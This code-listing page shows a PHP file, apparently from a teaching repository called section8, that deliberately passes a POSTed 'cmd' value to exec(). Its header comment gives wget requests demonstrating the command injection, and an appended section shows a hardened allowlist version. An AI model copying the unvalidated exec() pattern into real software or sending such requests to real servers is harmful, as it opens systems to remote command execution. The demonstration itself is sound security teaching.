
/html/exec.php

https://bitbucket.org/gerbercj/section8
PHP | 41 lines | 30 code | 2 blank | 9 comment | 1 complexity | 08588232bad006f3000a20a61de910f2 MD5
<?php
/**********************************************************************
 * exec() attack
 *
 * To demonstrate the exploit, try the following:
 * wget -qO- http://section8/exec.php --post-data="cmd=whoami"
 * wget -qO- http://section8/exec.php --post-data="cmd=uname -a"
 *
 **********************************************************************/
// handle command requests
if (isset($_POST['cmd']))
    exec($_POST['cmd'], $output);
else
    $output=array();
?>
<html>
<head>
<title>exec() Attack</title>
</head>
<body>
<p>Available commands:</p>
<form method="POST" action="exec.php">
<select name="cmd">
<option value='date' selected='selected'>date</option>
<option value='cal'>cal</option>
<option value='ls'>ls</option>
</select>
<input type="submit" name="exec() it!" />
</form>
<hr />
<p>Output of last command:</p>
<pre>
<?php
foreach ($output as $line)
    print "$line\n";
?>
</pre>
</body>
</html>
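
For contrast with the handler above, a hardened version is sketched here as an added example that is not part of the section8 repository. The form's `<select>` only restricts what a browser sends, so the server must map the submitted value to a fixed command itself. The function name `run_allowed`, the binary paths and the log message are assumptions.

```php
<?php
// Added example (not from the original file): allowlist-based replacement
// for the exec($_POST['cmd']) handler. Keys mirror the form's <option>
// values; the binary paths are assumptions and may differ per system.
const ALLOWED_COMMANDS = [
    'date' => ['/bin/date'],
    'cal'  => ['/usr/bin/cal'],
    'ls'   => ['/bin/ls'],
];

// Returns the output lines of an allowlisted command, or an empty array
// when the key is unknown or the command fails.
function run_allowed(string $key): array
{
    if (!array_key_exists($key, ALLOWED_COMMANDS)) {
        // Rejected values are worth logging: a value outside the form's
        // options means the request did not come from the form as served.
        error_log('exec.php: rejected cmd value ' . json_encode(substr($key, 0, 64)));
        return [];
    }

    // The command line is built only from server-side constants; the
    // request value is used solely as a lookup key and never reaches the shell.
    $command = implode(' ', array_map('escapeshellarg', ALLOWED_COMMANDS[$key]));

    $output = [];
    exec($command, $output, $status);
    return $status === 0 ? $output : [];
}

// Accept only a scalar string; cmd[]=... style array input is ignored.
$cmd = $_POST['cmd'] ?? null;
$output = is_string($cmd) ? run_allowed($cmd) : [];

// Escape command output before writing it into the <pre> block.
foreach ($output as $line) {
    print htmlspecialchars($line, ENT_QUOTES, 'UTF-8') . "\n";
}
```

With this handler, the two `wget` requests from the file's header comment return an empty output block and leave a log entry, because `whoami` and `uname -a` are not keys in the allowlist.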